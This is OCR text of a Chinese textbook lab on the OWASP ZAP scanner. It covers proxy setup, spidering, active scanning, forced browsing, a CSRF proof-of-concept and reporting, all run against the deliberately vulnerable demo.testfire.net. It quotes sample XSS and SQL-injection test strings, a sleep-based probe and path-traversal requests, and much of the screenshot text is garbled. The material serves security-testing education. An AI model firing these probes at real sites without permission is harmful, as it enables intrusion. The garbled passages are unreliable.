CD fE IE 中 按 住 Alt 键 ,会 显示 菜单 ,选择 “工具 ”一 “Internet 选项 ”命令 ,弹出 
"Internet 选项 ”对 话 框 ,选择 “连接 ”选项 卡 , 单 击 “ 局 域 网 设置 ”按钮 ,如 图 18-20 所 示 , 弹 出 
“局 域 网 (LAN) 设 置 ”对话 框 。 

(2) 选择 “为 LAN 使 用 代理 服务 器 ”, 配 置地 址 和 端口 ,完成 代理 配置 ,如 图 18-21 
所 示 。 






































图 18-18 ”Options 对 话 框 





uersa ee 到 me 
Configure Proxies to Access the Internet 
© No proxy 


© Auto-detect proxy settings for this network 











SOCKSv4 @ SOCKSvS [F] Remote DNS 


No Proxy for: | 
localhost, 127.0.0.1 | 





Example: mozilla.org, .net.nz, 192.168.1.0/24 
© Automatic proxy configuration URL: 
[ | Reload 











Do not prompt for authentication if password is saved 


ien] (meea) [uicina] 








图 18-19 Firefox 配置 代理 








自动 检测 设置 内 
E ems) 











地 址 [RJ | 


上 日 为 LAN 使 用 代理 服务 器 [这 些 设置 不 用 于 拨号 或 YPN i£ #)pQ 
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z [== [Bi FE 














拨号 和 虚拟 专用 网 络 设置 


只 mem me EET 





Bis Lai 








NEN 


部 黑 要 为 连接 配置 代理 服务 器 ， 请 选择 " 设 





X0)... 





ES vx)... 
WHO. ] 


AEG 


ispa m a 


实生 


























自动 配置 
[pM ik 要 确保 使 用 手动 设置 ， 请 禁用 自动 配 


OMIEF [localhost aom: [0000 | 高 级 (cl | 
CI 对 于 本 地 地 址 不 使 用 代理 服务 器 [Bl 














18-21 IE 配置 代理 


18.3.2 整体 框架 


ZAP 的 整体 框架 包括 用 户 接口 层 、 业 务 逻 辑 层 和 数据 层 ,框架 结构 如 图 18-22 所 示 。 


18.3.3 用户 界 面 


OWASP ZAP 主 窗口 包 含 菜 单 栏 .工具 栏 、 应 用 程序 树 、 扫 描 配 置 列表 、 扫 描 结果 列表 、 


状态 栏 ,如 图 18-23 所 示 。 


CD 菜单 栏 可 以 访问 所 有 自动 化 和 手工 测试 的 工具 。 
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1 | mun mmus [5 

Warmi 
TREE 5 


文件 M4 Ré 分 析 报告 IR Onine Aun 








Tag fe d BER 


渗透 注入 模块 





漏洞 分 析 模块 





图 18-22 整体 框架 结构 





Suam mium c OO £c ]OocO093^?.--»»oxmNé&hm v 








.] Sents 
了 局 Mhtpjdemotestrenet — R 
L] R W GET:detauttaspr 
L1 M W GET detauftasps(contel| 
|] R M GETfeedbackasp 
C] R &GET-Prvacypolicy aspa( 
> E R waqman 
* 国 mwbank 应 用 程序 


elcome e r 
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilites in web applications. 


AR [wa — | X tts T. sanptConsole 
roxy 


To quickly test an application. enter its URL below and press atack. 扫描 配置 列表 


Please be aware that you should only attack applications that you have been specifically been given permission to test 








MID ee URL to atack: [wmm | *sesa- ] 
[| R W GET:survey_questons, Ea 一 E 一 
L] R MGETsMe css. B Ld 
D R GET disciimer nimun || Progress Hack complete - see me Alerts tab for details of any issues found. 
mr g - 
` - - ` - 
[ Orue | Ces | rpsessions ZestResuns | cients af WebSockets WéAwxSpde | (je ] 
Ese ET 3 ELE D inati M Spider A Forced Browse 
2e FREEDPSEDECREE- 
M TIS 
* lll m Cross Ste Scripting (Refiected) (4) NIU CRGME SIDA RATE E FEER 
* ll P SOL injection (2) iu 
V BE NK eh Ere dicun QU girare oae 
* lll P Directory browsing (2) 
* (ll: Cookie set without Htpon fag (55) 扫描 结果 列表 
> Ñ& P: Cross-domain JavaScript source fle inclusion 
* lll P Password Autocomplete in browser (2) 
* ll F: X-Content-Type-Options header missing (97) 
” ll P X-Frame-Options header not set (53) 
R2 R24 owo ° o Qo wo 
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(2) 工具 栏 是 一 些 通用 功能 的 按钮 。 
(3) 应 用 程序 树 在 主 窗口 的 左上 方 ,显示 站 点 树 和 脚本 树 。 


(4) 扫描 配置 列表 在 右上 方 ,可 以 显示 修改 请 求 、 响 应 和 脚本 。 


O 扫描 结果 列表 在 右 下 方 ,显示 详细 的 自动 化 和 手工 的 测试 的 工具 。 
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(6) 状态 栏 位 于 底部 ,显示 发 现 的 警告 数量 和 测试 状态 。 
注意 : 为 了 界面 简洁 ,很 多 功能 都 在 右键 快捷 菜单 中 。 

18.3.4 基本 设置 
菜单 栏 中 包含 所 有 扫描 命令 ,如 图 18-24 所 示 。 


CD 选择 "文件 ”一 “新建 会 话 ? 命 令 , 如 果 没有 保存 当前 会 话 , 会 显示 如 图 18-25 所 示 的 
提示 警告 框 ,否则 就 会 和 默认 界面 一 样 ,输入 攻击 URL. 





OWASP ZAP 


o The current session is not saved. Discard and create new session? 
Ecco NN (=s) = 
Ñin x6 分 析 ië IR Onine 帮助 


图 18-24 菜单 栏 图 18-25 ”提示 警告 框 











(2) 选择 “文件 ”>“ 打 开会 话 ” 命 令 , 选 择 一 个 之 前 已 经 保存 的 会 话 ,可 以 将 其 打开 ; 如 
果 打 开 之 前 不 保存 当前 会 话 , 将 会 丢掉 所 有 数据 。 
(3) 选择 “工具 ”一 Options 命令 ,打开 Options 对 话 框 ,选择 “本 地 代理 "(通过 本 地 代理 
进行 测试 ) ,参见 图 18-13. 
(4) 选择 “工具 ”一 Options 命令 ,打开 Options 对 话 框 ,选择 Connection( 设 置 Timeout 
时 间 以 及 网 络 代理 ,认证 ), 如 图 18-26 所 示 。 
| Q Options 


v Options. 
Active Scan Input Vectors 
























AJAX Spider 

Anti CSRF Tokens 

API 

Applications 

Authentication (Deprecated) 
Breakpoints 
Certificate 






Ø ss.3 ( is 1 (Z ns11 (Z] ris 12 


Database 





Dynamic SSL Certificates Use proxy chain 

Encode/Decode 

Extensions DD Use an outgoing proxy server. 
Forced Browse Y | | Address/Domain Name: 

















EE: 
图 18-26 设置 连接 


G) X& FE" T. H."— Options 命令 ,打开 Options 对 话 框 ,选择 Spider( 疏 虫 ,设置 连接 的 
线程 等 ) ,如 图 18-27 所 示 o 

(6) 选择 “工具 ”一 Options 命令 ,打开 Options 对 话 框 ,选择 Forced Browse( 强 制 浏览 ， 
此 处 可 导入 字典 文件 ) ,如 图 18-28 所 示 。 强 制 浏 览 是 一 种 枚 举 攻 击 ,访问 那些 未 被 应 用 程 
序 引 用 但 仍 可 以 访问 的 资源 。 攻 击 者 可 以 使 用 蛮 力 技术 ,去 搜索 域 目录 中 未 被 链接 的 内 容 ， 
例如 临时 目录 和 文件 ,一 些 老 的 备份 和 配置 文件 。 这 些 资 源 可 能 存储 着 相关 应 用 程序 的 敏 
感 信息 ,如 源 代码 、 内 部 网 络 寻 址 等 。 
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Http Sessions 
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图 18-28 ”强制 浏览 


下 面 举 一 个 例子 ,通过 枚 举 渗透 URL 参数 的 技术 ,进行 可 预测 的 资源 攻击 。 

通过 下 面 的 URL 检查 在 线 的 议程 : 

www. site — example. com/users/calendar. php/user1/20070715 

在 这 个 URL 中 ,可 能 识别 用 户 名 (userl1) 和 日 期 (mm/dd/yyyy) ,如 果 用 户 企 图 去 强制 
浏览 攻击 ,可 以 尝试 下 面 的 URL: 

www. site - example. com/users/calendar. php/user6/20070716 

如 果 访 问 成 功 , 则 可 以 进一步 攻击 。 

(7) 选择 “分 析 ” 一 Scan Policy 命令 ,打开 Scan Policy 对 话 框 ,如 图 18-29 Bros 。 


18.3.5 工作 流程 


CD 探索 : 使 用 浏览 器 可 以 探索 所 有 应 用 程序 提供 的 功能 。 打 开 各 个 URL, 单 击 所 有 
按钮 ,填写 并 提交 一 切 表 单 类 别 。 应 用 程序 如 果 支 持 多 个 用 户 ,就 会 将 每 一 个 用 户 分 别 保存 
在 不 同 的 文件 中 , 当 使 用 下 一 个 用 户 的 时 候 ,会 启动 一 个 新 的 会 话 。 

(2) ER: 使 用 疏 虫 找到 所 有 网 址 。 疏 虫 疏 得 非常 快 , 但 对 于 AJAX 应 用 程序 不 是 很 








18-29 Scan Policy 对 话 框 


有 效 ,这 种 情况 下 用 AJAX Spider 更 好 ,如 图 18-30 所 示 , 只 是 AJAX Spider MEITE BE 2 18 
很 多 。 








图 18-30 AJAX Spider 


(3) 暴力 扫描 : 使 用 暴力 扫描 器 找到 未 被 引用 的 文件 和 目录 。 

(4) 主动 扫描 : 使 用 主动 扫描 器 找到 基本 的 漏洞 。 

(5) 手动 测试 : 上 述 步 骤 或 许 找到 了 基本 的 漏洞 ,但 为 了 找到 更 多 的 漏洞 ,需要 手动 测 
试 应 用 程序 。 

(6) 另外 还 有 一 项 端口 扫描 的 功能 ,作为 辅助 测试 用 (和 安装 配置 环境 相关 ,有 的 安装 
后 可 能 没有 该 项 功能 ) 。 端 口 扫描 不 是 ZAP 的 主要 功能 ,Nmap 端口 扫描 工具 更 为 强大 ,这 
里 不 再 详 述 。 

(7) 由 于 ZAP 是 可 以 截获 所 有 的 请 求 和 响应 的 ,意味 着 所 有 这 些 数据 可 以 通过 ZAP 
被 修改 ,包括 HTTP、HTTPS、WebSockets and Post 信息 。 图 18-31 所 示 的 按钮 是 用 来 控 
制 断 点 的 。 








18-31 ”控制 断 点 按钮 
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单 击 图 18-31 中 的 Break on all requests 或 Break on all responses. fE Break 选项 卡 中 
显示 的 截取 信息 都 是 可 以 被 修改 再 提交 的 。 自 定义 的 断 点 可 以 根据 使 用 者 定义 的 一 些 规则 


来 截取 信息 。 


18.4 自动 扫描 实例 





下 面 用 国外 测试 网 址 http://demo. testfire. net/ 作 为 实例 来 讲解 ZAP 自动 扫描 。 


18.4.1 扫描 配置 


(1) 配置 代理 ,参见 图 18-13。 
(2) 选择 扫描 模式 ,如 图 18-32 所 示 。 










文件 编辑 md 分 析 报告 工具 Online Mb 





i g Dga Oon v +=, 





"T 














L S Sate mode will not allow you to do anything potentially dangerous 
935 Protected mode: will only allow you to do potentially dangerous things on items in Scope 








Standard mode: will allow you to do potentially dangerous things on anything! — 





图 18-32 扫描 模式 


G) 配置 扫描 策略 ,如 图 18-33 所 示 。 
























































Scan Pol 
ScanPolicy — — == 
Client browser E 一 -一 一 一 一 一 一 lg 
Information gathering Policy: Defaut policy 
Injection. 
Miscellaneous Default Alert Threshold: [Meaum 国 (Default threshold) 
Server security 人 = 3 
Apply [Detaut Iz] Threshold To (an 国 |Rues[ co 
|Aepw|Detaut w)srengmTo [are mjRues| Go ] 
Threshold | Strength 
| Client browser Default Default 
Information gathering Default Defaut 
| Injection Default Defauit 
Miscellaneous Defauit Default 
== Default Detauit 
and strengths can be changed by clicking on them [cancer | | ox J 


图 18-33 ”扫描 策略 


18.4.2 扫描 步骤 


CD 输入 待 攻击 网 站 的 URL, 如 图 18-34 所 示 , 
(2) 单 击 Attack 按钮 ,ZAP 将 会 自动 息 取 这 个 网 站 的 所 有 URL, 并 主动 扫描 。 
(3) 等 待 攻击 结束 , 回 到 初始 设置 界面 ,参见 图 18-34。 
(4) 单 击 Active Scan 选项 卡 ,可 以 看 到 完成 100% ,如 图 18-35 所 示 。 
(5) 单 击 Spider 选项 卡 ,可 以 看 到 也 完成 100% ,如 图 18-36 所 示 。 





实验 18 ”安全 渗透 测试 工具 ZAP il Ra 





Welcome to the OWASP Zed Attack Proxy (ZAP) 
ZAP is an easy io use integrated penetlon eng boci tortning viriles h web aoohcadons 
€————————————————" 


To quickly test an application, entar ts URL below and press Atack 














For a more in depth test you should explore your application using your browser or automated regression tests while praning through ZAP 





It you are using Firefox 24 0 or ater you can us 


Configure your browser. | B Plug-n-Hack. 


"Plug-n-Hack to configure your browser 








Or pont your browser at: [Php caos 











图 18-34 输入 待 攻击 网 站 的 URL 








New Scan pay 
口 | Rea Timestamp | Resp Timestamp | Metnod JuRL | Code. 
1364 O40VIS 131310 04015 13 1310 Mp oemo estre nei .11111411111111.L NENF 
1365 040/15 13 1309 040105 131310 mp paema lesire neticomment asp 
1366 osons 131310 ons 131311 ip Ióemo lestie ne. 1.11414111.11.11.11.1 NAngows. 
1367 040115 1313.31 niis 131311 Mig emo tesire ne. 111114111111.11..1 Jelcpass 
1468 040115 13:310 oons 13:331 
1469 040115 13:31 0005434342 
4470 040115 53:331 oars 131312 
A371 0401N5 1313:12 oas 131312 
4472 040115 131312 oaos 131313 
4473 040115 131332 O01NS 131313 
4474 0401115 131313 Oeni 121213 ip Ióemo lesire nei 1111111111111 WEBER 
AA75 osons 131313 040105 13:314 pidemo lesire nev 1111144111111. novis 
osons 13134 0406434334 ip Ióemo lesire ne /77711117111 /elcpasswd 
osons 131313 040i 131314 ip demo lesire necomment aspa 
osons 13 134 0400543433 Wip demo testre neY. %5C %5C. NC. NEC. %5C NC. 
040VI5 12:315 oaos 13 1315 Nip domo lestire ne. 5C. NEC. %50. NC. 5C. %5C 
osons 1313315 ODS 131316 Mp demo testira nel %5C_S5C W5C. SC XC 

















B5588558588585525 














284849484888888 | 

















图 18-36 ”Spider 选项 卡 
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(6) 选择 “警报 ?选项 卡 , 可 以 看 到 扫描 出 来 的 所 有 漏洞 ,如 图 18-37 所 示 。 


























me | me [Xe D Bñ | $ë Spider | 六 ForcedBrowse | @ Fuzer | -] t | < Htp Sessions 
oe 所 有 报警 的 全 部 俩 节 将 在 这 里 显示 。 
T@S 

Pl Cross Sile Soping Rates) (0 您 可 以 在 记录 和 夺 择 加 车 报 的 相关 行 右 击 手动 添加 警报 。 


> 篇 e sot injection (2) 

* 篇 P Application Error disclosure (2) 

* (ili P Directory browsing (2) 

* (ili e: Cookie set without HttpOnly flag (55) 

> (lll F Cross-domain JavaScript source file inclusion I 
* (ili F Password Autocomplete in browser (2) 

* (ili F X-Content-Type-Options header missing (98) 

* (lj = X-Frame-Options header not set (63) 


您 还 可 以 通过 9 击 它们 来 编辑 这 些 警报 * 














图 18-37 “警报 ?选项 卡 (扫描 结果 ) 


CD 双击 每 一 个 漏洞 可 以 看 到 测试 数据 。 图 18-38 所 示 为 XSS 漏洞 测试 ,并 且 可 以 根 
据 手动 检查 结果 修改 各 个 选项 。 






























了 局 PinttpJidemo tesffire net 
L f» W GET default aspx 
LÌ M W GET defaut aspx(content) 
L] R W GETPrivaorpolicy aspr(sec.lemplate) 
> E  wadmin 
> L3 Ri W bank 
LÌ R MGETfeedback aspx o asprerrorpatn. 


|) f MGETcg.exe. E n — 
LÌ R W GET survey_questions aspx 
L] @ &GET:syle css. Evidence: | </b><script>alert(1).</script><b> 


L] ° WGETdisclaimer htm(uri) 

LÌ fi POST comment aspxícfile.comments, email, addrname sublecLsub 
LÌ f WGETHhigh. eld investments.htm 
C] R M GET default aspx(contentjob) 
C] f GET:bank 
































Cross-site Scripting (XSS) is an attack technique that involves echoing att; 
BX instance can be a standard web browser client, or a browser object embe 
an RSS reader, or an email client The code itself is usually written in HTM 











[F] POST htpWdemotestfre neUbankAogin asr 
[E POST: ntpydemotestire netcommentaspx 
> (ili e SQL injection (2) 

” ll P Application Error disclosure (2) 

* Ñ& P% Directory browsing (2) 

* (il P Cookie set without HttpOnly fag (55) 


> 篇 R Cross-domain JavaScript source file inclusion 
— 














18-38 XSS 漏洞 测试 


图 18-39 所 示 是 SQL 注入 漏洞 测试 数据 ,并 且 可 以 根据 手动 检查 结果 修改 各 个 选项 。 
(8) 打开 扫描 的 站 点 ,可 以 看 到 发 送 的 所 有 请 求 , 如 图 18-40 所 示 。 


实验 18 ”安全 渗透 测试 工具 ZAP 训练 ç 























The page results were successfully manipulated using the 
boolean conditions [ZAP' AND '1'='1' —] and [ZAP' OR "t1 —] 
The parameter value being modified was NOT stripped from the 


Do not trust client side input, even if there is client side validation 
in place. 
In general, type check ali data on the server side. 











图 18-39 SQL 注入 漏洞 测试 


Bea ewea | 








| 9 noms (GET http://demo. testfire.net/CopyA20(2)X200fx20zearch -aspx HTTP/1-1 
Ti Montp idemo tese net User-Agent: ozilla/4.8 (compatible; STE 6.0; Windows NT 5.97) 
D R GET Copy (3) ot commentaspe pragna: no-cache 
L R GET Copy (2) ot comment aspe |Cache-Control: no-cache 
] R GET Copy ot comment aspr L " 
` e GET Copy C) ol search aspa Re e 


Most: deso.testfire.net 


L3, MGETCopy ot search aspr 
L P GETCopy (3) of survey_questions aspx 
口 GET Copy (2) of survey. questions. aspi. 
L P GET.Copy of survey. questions aspa | 
L GET Copy (3) ot feedback aspx 
D GET Copy Q) ol feedback aspx 
L P GET Copy of feedback aspe 
D P GET.Copy (3) of defaut aspx 
L P GET Copy (2) o defaut aspx 
* E A Copy otbank 
D mcErcopy ot default aspe 
L F GET:Copy (3) of Privacypolicy.aspr 
] GET Copy (2) ot Privacypolicy aspr 
I GET Copy of Priacypolicyaspr. 
P M GETrobols tt 
P M GET temap imi 
nu s * 


1840 ”发 送 的 所 有 请 求 


























18.4.3 进一步 扫描 


接 下 来 可 以 通过 Forced Browse 选项 卡 继续 对 网 站 进行 强制 浏览 。 
这 里 的 站 点 列表 包含 的 是 浏览 器 打开 的 网 站 ,所 以 要 先 用 浏览 器 打开 http://demo. 
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testfire. net/ ,才能 在 站 点 列表 里 选择 demo. testfire. net:80, 然 后 从 List 里 面 选择 一 个 文 
件 , 单 击 Start Force Browse 按钮 开始 ,如 图 18-41 所 示 。 





= History | & Search | Fë Aers | ` Output | 3€ Break Points | ) Active Scan | 3& Spider E Port Scan 


demolestirenet80 |w)List. directonglist-t ot jw) pum 0% 


Req. Timestamp | Resp. Timestamp | Method. | URL. 





























Ë 18-41 Forced Browse 选项 卡 


从 左边 的 树 中 查看 截取 的 请 求 , 并 选择 Generate anti CSRF test FORM, ,如 图 18-42 
所 示 。 











LÌ P GET.Copy (3) of Privacypolicy aspx | [POST http://demo. testfire. 
[| Fe GET:Copy (2) of Privacypolicy.aspx User-Agent: Mozilla/4.0 (d 
|] M GET:Copy of Privacypolicy.aspx Pragma: no-cache 

[| M WGET:robots bt. Cache-Control: no-cache 
[ A wGET-stemapxmi Content-Type: application 


Content-Length: 78 


L) M M GETPrivacypolicy.aspx(sec template) Host: demo.testfire.net 


L f'GETPrvacypolicy aspr(sec.sleep 55 template) 

|) Fe GET:Privacypolicy - Copy.aspx 

L RGET.Privacypolicy - Copy (2) aspx 

Cl M GET Privacypolicy - Copy (3) aspx 

L] M GET Privacypolicybackup aspx 1 
> ED A M bank Qm cri 

C) M M GET default aspx cfile-coments. txt: name-«:| 

L M W GET default aspx(content) 

|] M M GETfeedbackaspr 

|] Ri MGET:survey questions.aspx 

|] M WGET:siMecss 

L M M GET:search aspx(btSearch) 

P M GET-disclaimer.htm(url) 








L] M M GET:high yield investments.m | Anack 

L M M GET retirement htm Delete 

L] M GET.inside points of interesthtm | dude in Context 

LÌ M M GET-servererror aspx(aspxerrorpath) | Flag as Context 

Run application 
Exclude from Context. 
Resend 

New Alert 

Show in History tab 
Open URL in Browser 
Copy URLs to clipboard 
Exclude trom > 
Break. 

Alerts for this node » 


` 

















L AA 25 28 2 




















Invoke with script. > 
Add o Zest Script. » 
Record Zest client script from node. 














图 18-42 Generate anti CSRF test FORM 


将 打开 一 个 新 的 选项 卡 CSRF proof of concept. EAA POST 请 求 的 参数 和 值 。 攻 击 


者 可 以 调整 值 ,伪造 请 求 如 图 18-43 所 示 。 


实验 18 ”安全 渗透 测试 工具 ZAP 训练 





@ http//localhost8080/OTHER/acsrf/other/genFon 只 ~ 
Edit View Favorites Tools Help 


Jg B) Suggested Sites w f Web Slice Gallery w jj. SoftStub | index new 





cfile 
comments 
email addr 
name 
subject 
submit 


[Semt 








http://demo.testfire.net/comment.aspx 





comments txt 














ZAP 














<script>alert("hello")</script> 








Submit 

















18-43 ”伪造 请 求 


对 于 某 个 请 求 可 以 登录 后 重新 发 送 测试 ,如 图 18-44 所 示 。 














GET.Copy (3) of Privacypolicy aspx 

P GET:Copy (2) of Privacypolicy aspx 

RI GET:Copy of Privacypolicy.aspx 

Ri M GET robots bt. 

fu M GET silemap xml 

Ri M GET Privacypolicy aspr(sec.template) 
IGET-Privacypolicy.aspx(sec.sleep 5s template) 
FI GET-Privacypolicy - Copy aspx 

FI GET-Privacypolicy - Copy (2) aspx 

Fe GET-Privacypolicy - Copy (3) aspx 

fs GET-Privacypolicybackup.aspx 


Showin History tab 


] R W GETinsi| Open URL in Browser 
] m €GETser 


Copy URLs to clipboard 

Exclude from 

Break. 

Alerts for this node 

Generale anti CSRF test FORM 
Invoke with script 

Add o Zest Script 

Record Zest client script from node. 
Compare 2 requests 

Compare 2 responses 

Monitor clients 

Include Channel Url in Context 
Exclude Channel Url from Context 






















| 
| 

















Refresh Sites tree 
Save Raw 











图 18-44 登录 
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18.4.4 扫描 结果 
等 到 所 有 扫描 都 结束 ,选择 “警报 ”选项 卡 ,查看 最 终 扫描 结果 ,如 图 18-45 所 示 。 








> 篇 R Cross Site Scripting (Reflected) (4) 
> (ili SQL Injection (2) 


> (ÈB P Application Error disclosure (2) 

> (il Directory browsing (2) 

> (lll F Cookie set without HttpOnly flag (55) 

> 篇 P Cross-domain JavaScript source file inclusion 
> (ll F Password Autocomplete in browser (2) 

> Ñ& P: X-Content-Type-Options header missing (98) 
> (ll f X-Frame-Options header not set (63) 











图 18-45 dizi 


最 后 生成 测试 报告 ,提交 给 开发 人 员 , 开 发 人 员 根 据 测试 报告 修补 漏洞 。 
18.5 手动 扫描 实例 


18. 5.1 扫描 配置 

根据 18. 3. 1 节 介绍 的 配置 代理 的 方式 ,选择 喜欢 的 浏览 器 ,为 浏览 器 配置 代理 。 
18.5.2 扫描 步骤 

(D 启动 ZAP, 

(2) f£ Firefox 中 输入 待 扫描 的 网 址 , 按 Enter 键 ,如 图 18-46 所 示 。 


Altoro Mutual 
(€ A demo.testfire.net EN g 器 d c 图 - 百度 < 


访问 最 多 L] Getting Started 





暂 不 需要 





Ta 当前 网 页 的 语言 为 英文 ， 是 否 需 要 翻译 为 中 文 ? 


AltoroMutual ue 


š E PERSONAL 























图 18-46 f£ Firefox 中 访问 网 站 


从 ZAP 的 站 点 树 中 可 以 看 到 刚刚 访问 的 网 
站 ,如 图 18-47 所 示 。 
G) 扑 行 。 右 击 站 点 ,选择 Attack Spider 命 
令 , 如 图 18-48 所 示 «ub zT le (TAS e. METT 
EAR E Pd A 7] ifi o TE A CERT TEX. 

3x H 8] 1X H Ped 38 er. Br VL IT AR De. 如 
图 18-49 所 示 。 

(4) 主动 扫描 。 现 在 可 以 主动 扫描 站 点 , 选 
TÉ Attack— Active Scan 命令 开始 主动 扫描 ,如 
图 18-50 所 示 。 主 动 扫 描 过 程 如 图 18-51 所 示 。 
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> 国 ntpyaddons gfoxcn 
* 国 fs hftp:liccivfirefoxchina cn 





F httpJdemo tesffire.net 
TE hip Jidownioad can mozilla net 
癌 htpywwwin cisco com 








图 18-47 IDE 中 站 点 树 








E Contexts 
Y @ P stes 
> 国 ntpyaddons gfoxcn 
> LÀ ntpyadu gforcn 

> fo http'icci fi 








Delete 
Include in Context 

Flag as Context. 

Run application 

Exclude trom Context. 

Resend.. 

New Alert- 

Show in History tab 

Open URL in Browser 

Copy URLs to clipboard 

Exclude from. 

Break. 

Alerts for this node 

Generale anti CSRF test FORM 
Invoke with script 

Add o Zest Script 

Record Zest client script from node. 
Compare 2 requests 

Compare 2 responses 

Monitor clients 

=I Include Channel Url in Context. 

Pj Exdude Channel Uri from Context. 











































D Adive Scan. 
3 Spider 
4^ Forced Browse site 

4^ Forced Browse directory 

六 Forced Browse directory (and children) 
Ë ` Port Scan host 

Mk AJAX Spider in Scope. 

A AJAX Spider Site. 











































Refresh Sites tree. 
Save Raw 


























1848 efi 














RRRSRRSRRRREERRARAR 


°. 
°. 
°. 
°. 
© 
© 
e 
e 
e 
e 
e 
e 
e 
° 
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Include in Context. P| 六 Forced Browse site 

Flag as Context. P | Z^ Forced Browse directory 

Run application. P | A Forced Browse directory (and children) 
> 


3M AtAX Spider in Scope 
$ AJAX Spider Site 















Generate anti CSRF test FORM 


Invoke with script. » 
Add to Zest Script » 
Record Zest cient script rom node. X Break Points 


Compare 2 requests 
Compare 2 responses 
Monitor clients » 





Include Channel Url in Context P 
Exclude Channel Uri from Context » 
Refresh Sites ree 





Save Raw 











图 18-50 启动 主动 扫描 





























E pamon | S searen fü nens [. oua | Wiper [ X trem Pones raaro [= ronson | race | Q raw [Paams | S ves senmona | C zen fetum 
IDE UDTTTTUCEEPEDE ~ 1# Cunmscms al! 

Pea Trnesano. | eso Tesame I jm I7 77) 
ET [TIT cer "es poems net Brands 0) Femaoen 
pm pi cer "e eco itr net BON we uraa degna at Am) Fermaden 

sas osons aam osons zat ET "ee ssec etr n WONN Oow NC arster amo maar 
sar ove 124414 prm ET a Adorno letste net BON weCehpasgmwddaleva an 400 Baans 
sas osons 124416 cer "e eco wawa ne BO ME oF Ne wet eria ae 0 maan, 

529 otov 124416 cer "es recor etc Minas as m mv tat 400 Bod fee 

fx otov 124414 er "eoero wiwa n rcr dama ME 03 Forgan 
591 osons 244 17 cer "e poer wama n KOC asma au 400 Bas Reaud 

52 osos aav cer Pp sésrolestre not 11114 11411111111 A0) Fotbdóen 

S39 osons 124437 cer Pes sena was nt BON near ird ne am) Formaden 

S4 ovis 124419 cer Peysserotutr tos 1111111411111114 Nino, A0) Form 
Em Er Pep sserso estre atit 1114114111111 tepa. am Formaoen 
DIA cer Ye Adorna lestie ne BOVEC. WEC WEC NEC NEC WSC. Am Formaden 

537 osons 24425 cer Nes bere P PONEC IC. NEC. NAC. NIC. WC Am) Fondden 

a osons 2449 cer "e boe see ne B crimi y 11 1 Am) Formasen 

599 osons 24429 enr "es oe ro estre nt orca ytra dS tdi 111. Am) Formasen 
ETSI r 18 soe estie ne SONSC. WC NSC NAC NSC NSC 40) Fomaoen, 








18-51 主动 扫描 过 程 
18.5.3 扫描 结果 


等 到 扫描 结束 ,查看 Alerts 选项 卡 ,可 以 看 到 所 有 扫描 出 的 漏洞 ,如 图 18-52 所 示 。 导 
出 报告 ,把 报告 发 给 开发 人 员 ,开发 人 员 将 根据 扫描 结果 列表 去 修改 漏洞 。 











* 篇 F Application Error Disclosure (10) 

”篇 s X-Frame-Options Header Not Set (119) 

» Ë F: Absence of Anti-CSRF Tokens (67) 

> 篇 F Cookie set without HttpOnly fiag (86) 

> (lj F Cross-Domain JavaScript Source File Inclusion 


> (lil F Information Disclosure - Debug Error Messages (6) 
» (ll F Password Autocomplete in browser (3) 

» Ñ F Web Browser XSS Protection Not Enabled (119) 

* (lij Fo X-Content-Type-Options Header Missing (120) 

> (i F Charset Mismatch (60) 

> (lj P WSDL File Passive Scanner (2) 














18-52 ”扫描 结果 
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所 有 扫描 也 可 以 都 是 手工 息 行 ,用 手 单 击 每 一 个 页 面 ,填写 提交 每 一 个 页 面 , 单 击 每 一 
个 按钮 ,IDE 中 会 列 出 所 有 手工 操作 所 到 达 的 页 面 。 


18.6 扫描 报告 


18.6.1 IDE 中 的 Alerts 
IDE 界面 的 执行 结果 警报 如 图 18-53 所 示 。 

















M-T--I 
> (ll F Cross Site Scripting (Reflected) (4) 
* 篇 f SQL Injection (2) 
* (ll = Application Error disclosure (2) 
> (il P Directory browsing (2) 
> ÑB F Cookie set without Htpony nag (57) 
': Cross-domain JavaScript source file inclusion (5) 
ll í Password Autocomplete in browser (3) 
> Ñ F X-Content-Type-Options header missing (119) 
> (li M X-Frame-Options header not set (78) 























R2 2 已 4 F 


图 18-53 ”执行 结果 警报 


18.6.2 生成 报告 
还 可 以 从 菜单 里 导出 报告 ,如 图 18-54 所 示 。 





j| Epor messages to File... 


[ @ sts |j isaisa] Pot Response to te. 


Export AI URLs to File... 

















iB kis Compare with another Session. 
[vii soping — — | Generate HTML Report. 
x Generate XML Report 





18-54 生成 Report 


下 面 介绍 Report 菜单 的 各 个 命令 。 

(1) Generate HTML Report; 生成 HTML 格式 的 包含 所 有 警报 的 报告 。 

(2) Generate XML Report; 生成 XML 格式 的 包含 所 有 警报 的 报告 。 

(3) Export Message to File; 将 信息 导出 到 文件 中 。 从 History 选项 卡 里 选择 要 存储 
的 信息 ,可 以 配合 Shift 键 选择 多 个 信息 。 

(4) Export Response to File: 导出 响应 信息 到 文件 中 。 从 History 选项 卡 里 选择 特定 
信息 。 

(5) Export All URLs to File: 将 所 有 访问 过 的 URL 导出 到 文件 。 


= 
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(6) Compare with another Session: 与 其 他 会 话 比较 ,这 个 命令 基于 保存 了 以 前 的 
会 话 。 


18.6.3 安全 扫描 报告 分 析 


选择 Report >Generate HTML Report 命令 ,导出 后 查看 ,报告 中 统计 了 警报 ,并 且 对 
每 个 警报 给 出 了 详细 描述 发 生 的 URL、 参 数 、 攻 击 输 入 的 脚本 ,同时 给 出 了 解决 方案 ,如 
图 18-55 所 示 。 这 不 仅 可 以 让 测试 工程 师 学 到 很 多 知识 ,并 且 可 以 让 开发 工程 师 在 修改 的 
时 候 不 用 太 费 时 。 多 看 报告 就 会 有 许多 收获 ,不 仅 能 知道 有 哪些 常见 的 漏洞 ,而 且 还 能 知道 
攻击 者 是 如 何 利 用 这 些 漏洞 进行 攻击 的 ,进而 可 修复 这 些 漏洞 。 











Description Cross-sito Scnptng (XSS) is an attack technique that nvoves echoing attacker supped code into a users browser instance. A browser instance can 
tune cyst embndóed in 2 votare product such as (ha browser wahin Wein. an RSS reader Or an emai chent. The code le s usall wt 
extend to VBScript, ActiveX, Java. Flash, or any other browser-supported technology. 


to read, modify and transmit any sensitive data accessible by the browser A Cross site Scnpted user Tae haner acor maeaea eae 
本 compromise 
poya dr rarka erarema r dy be barier ba e ie papate ae bara T er e 
There are three types of Cross sde Scripting atacks: non persistent, persistent and DOM based 


Non persistent attacks and DOM based attacks requiro a user to either visit a specially crafted ink laced with malicious code or visit a malicious web. 


When an attacker gats a aara rouoer io acie Nau coda. e code id nn whin She Pecan cote for zona) c he hosing wab ee gx 


| eh 
can be submitted kL. k. LLL T ‘or submitting the malicious. 
m EE 
